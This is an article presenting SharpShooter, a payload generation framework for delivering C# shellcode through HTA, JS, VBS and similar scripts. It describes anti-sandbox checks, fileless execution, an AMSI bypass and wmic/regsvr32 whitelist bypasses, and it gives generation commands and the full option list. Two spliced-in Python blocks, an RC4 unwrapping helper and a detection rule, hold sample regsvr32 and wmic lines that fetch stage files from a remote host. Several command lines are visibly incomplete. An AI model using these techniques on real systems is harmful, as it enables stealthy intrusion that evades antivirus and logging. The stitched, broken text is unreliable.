Payload Generation Framework – SharpShooter

The increased use of PowerShell in attacks has led to PowerShell being much better logged and detected today. PowerShell is flexible, but alternatives were urgently needed, and attackers turned to C# and the .NET utilities to execute code on Windows. That is how SharpShooter, a payload generation framework, came about.

SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.

Payload Generation Framework: SharpShooter

SharpShooter is a payload generation framework for the retrieval and execution of arbitrary C# source code. It leverages James Forshaw’s DotNetToJScript tool and supports the creation of payloads in a wide variety of formats, such as:

  • HTA, JS, VBS, JSE, VBA, VBE and WSF.

These payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection. SharpShooter targets v2, v3 and v4 of the .NET framework, which are found on most end-user Windows workstations.


  • Sandbox Detection: several built-in techniques to avoid executing in analysis environments, including identifying analysis tools
  • Stageless Execution: shellcode is injected in memory directly into the process, so the framework supports a fully fileless mode
  • XSL Exploitation (Squiblytwo): bypasses signatures and security solutions by executing full-trust XSL (eXtensible Stylesheet Language) scripts from the WMIC command line
  • Squiblydoo and Squiblytwo support: COM staging and XSL exploitation directly through COM
  • AMSI Bypass: uses an XPath expression in the XSL file to bypass the Windows Defender AMSI signature

Sandbox Detection

SharpShooter has several default techniques for detecting sandboxes and analysis tools, and you can choose some or all of them. The payload will not execute if any of the selected checks indicates an analysis environment (for example, the expected domain is absent or a sandbox artifact is found).

  • Key to Domain: the payload will only execute on a specific domain;
  • Ensure Domain Joined: the payload will only execute if the workstation is domain joined;
  • Check for Sandbox Artifacts: searches the file system for artifacts of known sandbox technologies and virtualisation systems; if any are found, the payload will not execute;
  • Check for Bad MACs: checks the MAC address of the system; if the vendor matches known virtualisation software, the payload will not execute;
  • Check for Debugging: if the payload is being debugged, it will not execute.

Stageless Execution

SharpShooter supports both staged and stageless payload execution. Because shellcode can be injected in memory directly into the process, the framework supports a fully fileless mode.

  • McAfee HTML template: if the user clicks the phishing link, a JavaScript file is opened and the shellcode is executed.
The template contains a base64-encoded, RC4-encrypted blob which is decrypted in memory on execution. The decrypted payload is the DotNetToJScript code that contains the SharpShooter .NET serialised object.
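The two-layer wrapping just described (base64 over RC4) is what an analyst has to peel back to look at a captured template. The following is an added analyst helper, not SharpShooter code or anything from the project; it assumes the analyst has already extracted the base64 blob and the RC4 key from the script, and it works on a constructed sample built inside the block (the key and the stand-in plaintext are made up, not taken from a real payload).

```python
import base64
import string

# Added analyst helper; not part of SharpShooter. It assumes the blob and the
# RC4 key have already been pulled out of the script, and only demonstrates the
# unwrapping order (base64 -> RC4) the page describes.


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream XOR). The cipher is symmetric,
    so the same call encrypts and decrypts; it also builds the sample below."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unwrap_blob(b64_blob: str, key: bytes) -> bytes:
    """Reverse the two layers the template applies: base64, then RC4."""
    return rc4(key, base64.b64decode(b64_blob))


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII. Script source scores near 1.0;
    a wrong key yields keystream-looking bytes that score far lower."""
    if not data:
        return 0.0
    printable = set(string.printable.encode())
    return sum(b in printable for b in data) / len(data)


def triage(b64_blob: str, key: bytes, threshold: float = 0.9) -> dict:
    """Decrypt the blob and report whether the result looks like script text."""
    plain = unwrap_blob(b64_blob, key)
    ratio = printable_ratio(plain)
    return {
        "length": len(plain),
        "printable_ratio": ratio,
        "looks_like_script": ratio >= threshold,
        "head": plain[:60],
    }


# Constructed sample: a stand-in plaintext wrapped the same way (RC4 under a
# made-up key, then base64). Neither the key nor the text comes from a real payload.
SAMPLE_KEY = b"constructed-example-key"
SAMPLE_PLAINTEXT = b"// constructed stand-in for the decrypted DotNetToJScript loader\nvar x = 1;\n"
SAMPLE_BLOB = base64.b64encode(rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT)).decode("ascii")

if __name__ == "__main__":
    print(triage(SAMPLE_BLOB, SAMPLE_KEY))
```

The printable-ratio check is a cheap way to confirm the recovered key before spending time reading the output: with the right key the decrypted layer is script text, with the wrong key it is effectively random bytes.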

Squiblydoo and Squiblytwo

SharpShooter supports Squiblydoo and Squiblytwo attacks.

  • One-liners using a COM interface (COM Staging):
    SharpShooter creates either an XSL- or SCT-hosted payload, and the script-based payload becomes a COM stager in HTA, VBS, JS, WSF or a similar format that executes either wmic.exe or regsvr32.exe.


    The following command will generate this with SharpShooter:

    python --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook -awl wmic --awlurl
  • XSL Exploitation directly through COM
    The benefit of this technique is that it avoids some of the indicators associated with the wmic.exe and regsvr32.exe techniques; in particular, there is no command line to be captured, so command-line logging will not detect it.


    This technique can be used by running:

    python --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x64payload.bin --smuggle --template mcafee --com xslremote --awlurl
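The COM staging path above leaves a characteristic trace in process-creation telemetry: a script host launching wmic.exe or regsvr32.exe with a URL or an .xsl/.sct file on the command line. The following is an added detection example, not SharpShooter code or anything from the project, run over constructed process-creation events (the field names image, parent and cmdline are assumptions; map them to your own EDR or Sysmon schema). As the text notes, the XSL-through-COM variant produces no such command line, so this rule covers only the wmic.exe/regsvr32.exe staging path and uses the script-host parent as a second signal.

```python
import re

# Added detection example; not SharpShooter code. Event fields (image, parent,
# cmdline) follow a generic process-creation record and are an assumption.

STAGER_BINARIES = {"wmic.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# A URL, or an .xsl/.sct filename, anywhere on the command line.
REMOTE_SCRIPT_RE = re.compile(r"https?://[^\s\"']+|\.(?:xsl|sct)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def stager_indicators(event: dict) -> list:
    """Reasons an event looks like a COM/AWL stager launch (empty list = clean)."""
    reasons = []
    if basename(event["image"]) not in STAGER_BINARIES:
        return reasons
    if REMOTE_SCRIPT_RE.search(event["cmdline"]):
        reasons.append("URL or XSL/SCT argument on the command line")
    parent = basename(event["parent"])
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    return reasons


def find_stagers(events: list) -> list:
    """Scan a list of events and return the suspicious ones with their reasons."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = stager_indicators(ev)
        if reasons:
            hits.append({"index": idx, "image": basename(ev["image"]), "reasons": reasons})
    return hits


# Constructed events (not real telemetry). Events 0 and 1 model the two
# application-whitelist bypass paths the page describes; events 2 and 3 are
# ordinary administrative uses of the same binaries and must not alert.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wmic os get /format:"http://203.0.113.10/stage.xsl"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"regsvr32 /s /i:http://203.0.113.10/stage.sct"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic os get caption,version"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
]

if __name__ == "__main__":
    for hit in find_stagers(SAMPLE_EVENTS):
        print(hit)
```

Keying on the binary name plus a remote or script-file argument keeps the rule from firing on routine wmic queries and local DLL registrations, while the parent-process check still catches a script-host launch whose command line has been obfuscated.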


Clone it from GitHub:

git clone


To see the available options, methods and techniques, run it with --help:

usage: [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help          show this help message and exit
  --stageless         Create a stageless payload
  --dotnetver <ver>   Target .NET Version: 2 or 4
  --com <com>         COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>         Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>   URL to retrieve XSL/SCT payload
  --payload <format>  Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>   Anti-sandbox techniques:
                      [1] Key to Domain (e.g. 1=CONTOSO)
                      [2] Ensure Domain Joined
                      [3] Check for Sandbox Artifacts
                      [4] Check for Bad MACs
                      [5] Check for Debugging
  --amsi <amsi>       Use amsi bypass technique: amsienable
  --delivery <type>   Delivery method: web, dns, both
  --rawscfile <path>  Path to raw shellcode file for stageless payloads
  --shellcode         Use built in shellcode execution
  --scfile <path>     Path to shellcode file as CSharp byte array
  --refs <refs>       References required to compile custom CSharp,
                      e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>    Namespace for custom CSharp,
  --entrypoint <ep>   Method to execute,
                      e.g. Main
  --web <web>         URI for web delivery
  --dns <dns>         Domain for DNS delivery
  --output <output>   Name of output file (e.g. maldoc)
  --smuggle           Smuggle file inside HTML
  --template <tpl>    Name of template file (e.g. mcafee)